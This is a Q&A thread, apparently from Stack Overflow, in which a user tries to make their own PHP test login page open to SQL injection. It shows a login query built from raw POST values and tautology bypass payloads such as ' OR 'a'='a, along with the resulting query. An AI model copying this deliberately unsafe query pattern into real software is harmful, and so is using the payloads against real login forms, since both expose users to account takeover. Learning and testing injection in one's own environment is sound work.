# How do I make my test website vulnerable to SQL injection?

Tags: php, sql, security, sql-injection

Here's a snippet of my login.php code:

```
if (isset($_POST['login'])){
    $username = $_POST['user'];
    $password = $_POST['pass'];
    $query = mysqli_query($con, "SELECT * FROM users WHERE password='$password' and username='$username'");
    $row = mysqli_fetch_array($query);
    if ($row > 0) {         
        $_SESSION['user_id']=$row['user_id'];
        header('location:home.php');    
    } else {
        echo 'Invalid Username and Password Combination';
    }
}
?>
```

the login works, but when I try to bypass the auth/login
by inputting **' or ''='** it returns this error

```
Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in C:\x\x\x\x.php on line 32
```

The login works when I input a valid user that is on the database:
Sample

```
Username: admin
Password: admin
```

What I wanna do is to bypass the login by inputting(sql injection)

```
Username: admin  
Password: **' ANYTHING ''='**
```

But then inputting `' ANYTHING ''='` returns the error mentioned above.

Comment: Both, how do i fix this error so that sql injection bypass will work. The login works when I input a valid username/password, but when I input ' or ''=' to bypass the login it returns that error.

Comment: Can you edit the question to show exactly what values you're using for `$username` and `$password`?

Comment: The resulting string needs to be syntactically valid SQL code. You can [configure mysqli](https://stackoverflow.com/questions/14578243/turning-query-errors-to-exceptions-in-mysqli) to display/log the exact parse error.

Answer (score 0):

You're getting that warning because the values you injected caused the query to fail, probably because of a MySQL syntax error.

Try these values instead:

```
$password = "' OR 'a'='a";
$username = "admin";
```

This will give the SQL string:

```
SELECT * FROM users WHERE password='' OR 'a'='a' and username='admin'
```

Which should be valid and return the admin user record.

Comment: Doesnt show the warning anymore, but it says invalid username/password.

Comment: @Enthel I suggest you store the SQL code into a variable so you can display it.